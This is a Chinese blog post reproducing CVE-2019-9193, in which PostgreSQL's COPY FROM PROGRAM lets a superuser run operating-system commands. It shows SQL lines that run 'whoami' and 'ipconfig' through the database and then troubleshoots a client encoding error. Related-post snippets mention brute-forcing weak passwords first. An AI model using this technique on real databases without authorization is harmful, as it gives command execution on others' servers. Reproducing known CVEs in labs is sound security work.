PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

最新推荐文章于 2024-05-28 15:18:53 发布
最新推荐文章于 2024-05-28 15:18:53 发布
阅读量1.7k 收藏
点赞数
分类专栏: 复现 文章标签: postgresql 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luminous_you/article/details/122327037
版权

漏洞原理
从9.3版本开始,Postgres新增了一个COPY TO/FROM PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
范围:9.3-11.2

连接数据库执行命令

DROP TABLE IF EXISTS cmd_exec;//第一次不执行这条,删除你想使用但已存在的表
CREATE TABLE cmd_exec(cmd_output text);//创建保存系统命令输出的表
COPY cmd_exec FROM PROGRAM 'whoami';//通过COPY FROM PROGRAM功能运行系统命令
SELECT * FROM cmd_exec;//查看结果

postgresql漏洞补丁版本:
https://www.postgresql.org/support/security/
问题:我用的pgadmin连接数据库,在执行这条命令时

COPY cmd_exec FROM PROGRAM 'ipconfig';

出现了以下错误
ERROR: invalid byte sequence for encoding “UTF8”: 0xc5 0xe4
CONTEXT: COPY cmd_exec, line 2
SQL 状态: 22021

暂未解决:不知道pgamdin设置编码的步骤。
xshell改编码的方式
https://blog.csdn.net/weixin_34228387/article/details/90158156

Postgres客户端编码问题
数据库编程的编码问题
数据库编程设计的编码问题包括三个方面:
数据库服务器编码;
数据库客户端编码;
本地环境编码。

1)查看PostgreSQL数据库服务器端编码:
postgres=# show server_encoding;
 server_encoding 
-----------------
 UTF8
(2)数据库客户端字符编码:
 客户端工具支持某种编码,必须能够显示从数据库读取的该种编码的字符,也能通过本工具将该种编码的字符提交到给服务器端。       
 查看PostgreSQL客户端工具psql编码:
 postgres=# show client_encoding;
 GBK
 postgres=# \encoding
 GBK
 指定Postgresql会话的客户端编码:
 postgres=# set client_encoding to 'utf8';
 SET
 postgres=# show client_encoding;
 client_encoding 
 -----------------
 UTF8
  (3)本地环境编码:
如果使用dos的命令行界面,本地环境就是指dos命令行环境的编码,可以使用dos命令chcp查看dos环境编码:
D:\Program Files\PowerCmd>chcp
活动代码页: 936
----936为简体中文,GBK;
如果在使用某种编辑器,则本地环境编码取该编辑器的编码设置。

https://www.cnblogs.com/winkey4986/p/6279243.html
參考:https://cloud.tencent.com/developer/article/1472565

luminous_you
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 823
PostgreSQL任意命令执行CVE-2019-9193
CVE-2019-9193权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 539
vulhub靶场复现postgresql
PostgreSQL数据库提权
m0_64481831的博客
05-28 763
postgreSQL是一个功能强大对象关系数据库管理系统。
CVE-2019-9193PostgreSQL 权限命令执行漏洞复现
m0_69801663的博客
12-23 1103
CVE-2019-9193PostgreSQL 权限命令执行漏洞
【vulhub】PostGresql权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 816
CVE-2019-9193
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3511
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
postgresql-14.1-1-windows-x64
12-05
The PostgreSQL Project thanks Jacob Champion for reporting this problem. (CVE-2021-23214) Make libpq reject extraneous data after an SSL or GSS encryption handshake (Tom Lane) A man-in-the-middle ...
PostgreSQLpostgresql-14.2-2-windows-x64.exe)
05-05
PostgreSQLpostgresql-14.2-2-windows-x64.exe),适用于Windows系统:PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象...
PostgreSQL权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2712
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要权限 所以要先弱口令爆破之后,然后查看是否是权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
CVE-2019-9193PostgreSQL 权限命令执行漏洞
m0_48520508的博客
01-20 871
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
漏洞复现PostgreSQL任意命令执行CVE-2019-9193)及被勒索回忆
qq_31042199的博客
08-15 1917
为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下: 漏洞名称 CVE-2019-9193 漏洞影响PostgreSQL版本 9.3-11.2 漏洞影响平台 windows+Linux+Mac OS 测试硬件环境 win10(家庭版) 虚拟机版本 ubuntu18.04 本次PostgreSQL版本 10.18 win10与ubuntu虚拟机连接方式 桥接 kali攻击机ip 192.168.31.68 靶机ip
CVE-2019-9193 PostgreSQL 权限命令执行漏洞
qq_51979295的博客
10-08 579
康复训练
漏洞复现PostgreSQL权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 383
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要权限所以要先弱口令爆破之后,然后查看是否是权限
PostgreSQL 权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 1013
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
Postgresql漏洞合集
weixin_46626737的博客
07-03 787
需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令。2.PostgreSQL 权限命令执行漏洞CVE-2019-9193)1.PostgreSQL 提权漏洞CVE-2018-1058)漏洞版本:9.3-11.2。漏洞版本:9.3-10。
postgresql yyyymmdd转换成yyyy-mm-dd
最新发布
06-26
PostgreSQL中,你可以使用`TO_CHAR`函数来格式化日期字段。如果你有一个`DATE`类型的字段`DATE_OUT`,并想将其转换为'YYYY-MM-DD'格式,可以按照以下步骤操作[^2]: ```sql SELECT TO_CHAR(DATE_OUT, 'YYYY-MM-DD') AS formatted_date FROM your_table; -- 替换your_table为你实际的表名 ``` 这将返回一个字符串列,其中日期已被格式化为'YYYY-MM-DD'格式。 如果你想将这个字符串再转换回日期类型,你可以这样做: ```sql SELECT TO_DATE(TO_CHAR(DATE_OUT, 'YYYY-MM-DD'), 'YYYY-MM-DD') AS date_in_original_format FROM your_table; ``` 这样,原始的日期格式就会被恢复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值